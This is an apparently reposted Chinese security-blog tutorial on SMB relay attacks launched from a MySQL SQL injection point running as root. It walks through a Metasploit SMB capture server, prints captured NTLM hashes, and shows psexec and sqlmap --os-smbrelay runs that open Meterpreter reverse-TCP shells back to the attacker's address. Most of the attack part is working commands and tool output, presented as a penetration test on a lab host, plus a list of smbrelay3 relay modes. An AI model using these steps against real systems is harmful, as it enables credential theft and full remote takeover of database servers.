热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Mysql数据库攻击技术

发布时间:2012-02-16 09:34文章来源:dis9文章作者:秩名 点击次数:
摘要:大家好,今天来更正我以前写的文章Databases SMBRelay AttAck,文章的内容介绍了针对MYSQL MSSQL PG三种数据库的SMBRelay AttAck,但是以前的博客数据丢失。如果谁保存了这篇请发给我。 (找出错别字留言,一个错别字一个九区邀请码) 当时介绍到MYSQL SMBRE...

大家好,今天来更正我以前写的文章“Databases SMBRelay AttAck”,文章的内容介绍了针对MYSQL MSSQL PG三种数据库的SMBRelay AttAck,但是以前的博客数据丢失。如果谁保存了这篇请发给我。 (找出错别字留言,一个错别字一个九区邀请码)

当时介绍到MYSQL SMBRELAY ATTACK的时候,是用了解析DLL到系统权限再攻击这一个办法。这种方法似乎和我们九区的非主流脑残黑客差不多,真的很二B,解析DLL到系统权限了还攻击做啥子。。。

 

下面进入正文了,如果MYSQL以Administrator权限运行,那么这种攻击就能成功!

 

数据库攻击技术

  

下面来PENTEST : 一个注入点,他是ROOT的权限

 

数据库攻击技术

 

我们来尝试他能不能读文件,ROOT权限应该能读

 

数据库攻击技术

 

恩 ,能读文件 (惊现HELEL大黑客!)

下面本地伪造个SMB SERVER服务器
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in JOHN format
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 445 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

msf auxiliary(smb) > exploit
[*] Auxiliary module execution completed

[*] Server started.
msf auxiliary(smb) >

然后读本共享试试

数据库攻击技术

 

^_^ 成功获得了 NTLM ,
NTLMv1 Response Captured from 192.1.1.130:1162
USER:Administrator DOMAIN:DIS9TEAM-B39270 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:be55aab30bf2e1268f57f90887c0d68e2f85252cc731bb25
NTHASH:54b41c2204df7a9e1478f3cfa64bd9e250f57a764a0eef36

下面就能用METASPLOIT的 exploit/windows/smb/psexec 模块 或者NESSUS的 SMB Shell 获得系统权限
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.1.1.1:1111
[*] Connecting to the server...
[*] Authenticating to 192.1.1.130:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created HgLceCLd.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.1.1.130[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (wZdMvYRY - "MWrLYVvwSxdptGUwjxeJoQYxVEOvvSh")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting HgLceCLd.exe...
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:1111 -> 192.1.1.130:1168) at 2012-01-09 16:56:34 +0800

 

如果你嫌弃上面的麻烦。你可以选择SQLMAP。强大的注入工具SQLMAP提供一条龙服务。
brk@Dis9Team:~/t/sqlmap$ sudo ./sqlmap.py -u "http://192.1.1.130/sql/index.php?id=1" --msf-path=/home/brk/t/msf3/ --os-smbrelay
[sudo] password for brk:

sqlmap/0.9 - automatic SQL injection and database takeover tool

http://sqlmap.sourceforge.net

[*] starting at: 17:04:54

[17:04:54] [INFO] using '/home/brk/t/sqlmap/output/192.1.1.130/session' as session file
[17:04:54] [INFO] testing connection to the target url
[17:04:54] [INFO] testing if the url is stable, wait a few seconds
[17:04:55] [INFO] url is stable
----------------省略-------------
[17:05:06] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 22 HTTP(s) requests:
---
---

[17:05:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.0.63, PHP 5.2.14
[17:05:11] [WARNING] it is unlikely that this attack will be successful because by default MySQL on Windows runs as Local System which is not a real user, it does not send the NTLM session hash when connecting to a SMB service
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
> 1
which is the local address? [192.1.1.1]
which local port number do you want to use? [50803] 5588
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which SMB port do you want to use?
[1] 139/TCP
[2] 445/TCP (default)
> 2
[17:06:34] [INFO] running Metasploit Framework 3 console locally, please wait..

[*] Processing /home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt for ERB directives.
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> use windows/smb/smb_relay
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVHOST 192.1.1.1
SRVHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set SRVPORT 445
SRVPORT => 445
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LPORT 5588
LPORT => 5588
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> set LHOST 192.1.1.1
LHOST => 192.1.1.1
resource (/home/brk/t/sqlmap/output/192.1.1.130/tmpudtxq.txt)> exploit
[*] Exploit running as background job.
---------------------------------
[*] Started reverse handler on 192.1.1.1:5588
[*] Server started.
[*] Deleting AaTNBUvw.exe...
[*] Sending Access Denied to 192.1.1.130:1204 DIS9TEAM-B39270Administrator
[*] Sending stage (752128 bytes) to 192.1.1.130
[*] Meterpreter session 1 opened (192.1.1.1:5588 -> 192.1.1.130:1205) at 2012-01-09 17:06:51 +0800

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 192.1.1.1:5588 -> 192.1.1.130:1205

 

数据库攻击技术

如果你是WINDOWS系统呢?? 你可以用这个工具来进行攻击smbrelay3.exe

他提供5种攻击方式:

* HTTP to SMB: Negotiate authentication with an HTTP client and relay credentials to another smb host.

* SMB to SMB: Negotiate authentication with an SMB computer and relay credentials to another windows computer.

* IMAP to SMB: Negotiate authentication with an email IMAP client and relay credentials to another host.

* POP3 to SMB: Negotiate authentication with an email POP3 client and relay credentials to another host.

* SMTP to SMB: Negotiate authentication with an email SMTP client SMB computer and relay credentials.

原文http://www.dis9.com/mysql-database-smbrelay-attack.html

 

标签分类: 数据库 攻击技术

上一篇:mysql注入sleep语句引发的拒绝服务
下一篇:PostgreSQL数据库攻击技术